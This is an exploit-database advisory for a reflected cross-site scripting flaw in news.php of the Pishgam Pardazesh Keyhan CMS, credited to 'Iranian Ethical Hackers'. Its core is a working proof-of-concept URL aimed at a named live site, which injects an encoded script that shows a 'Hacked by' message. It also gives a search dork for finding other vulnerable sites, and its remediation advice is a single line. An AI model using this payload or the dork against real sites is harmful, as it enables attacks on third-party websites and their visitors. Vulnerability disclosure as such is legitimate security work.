Pishgam Pardazesh Keyhan cms Cross Site Scripting Vulnerability

2018.07.21

IRANIAN ETHICAL HACKERS (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"طراح و پشتیبان : پیشگام پردازش کیهان"

[+] Exploit Title ; Pishgam Pardazesh Keyhan cms Cross Site Scripting Vulnerability
[+] Date : 2018-07-21
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : http://www.pipak.ir/
[+] Dork : intext:"طراح و پشتیبان : پیشگام پردازش کیهان"
[+] My Site : http://4rtxtnk7o5yt3mfw.onion/
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] Pishgam Pardazesh Keyhan is cms.
[+] Poc :
[!] http://www.pishfarfars.ir/news.php?id=4%22%3E%3C/SCRIPT%3E%E2%80%9D%3E%E2%80%99%3E%3CSCRIPT%3Ealert(String.fromCharCode(72,97,99,107,101,100,32,98,89,32,58,32,73,114,97,110,105,97,110,32,69,116,104,105,99,97,108,32,72,97,99,107,101,114,115,124,124,87,101,32,65,114,101,32,58,32,48,80,51,78,51,82,32,45,32,77,101,104,114,100,97,100,95,73,99,101,32,45,32,83,48,33,104,112,32,45,32,66,97,120,84,117,114,107,50,52%20))%3C/SCRIPT%3E
[+] Type of vulnerability :
[!] Xss -> Reflected
[+] Security Level :
[!] medium
[+] Exploitation Technique:
[!] Remote
[+] Request Method :
[!] GET
[+] Vulnerability Files :
[!] news.php
[+] Fix :
[!] Restrict user input or replace bad characters
[+] We Are : [+] 0P3N3R [+] Ebrahim_Vaker

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Pishgam Pardazesh Keyhan cms Cross Site Scripting Vulnerability

Dork: intext:"طراح و پشتیبان : پیشگام پردازش کیهان"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.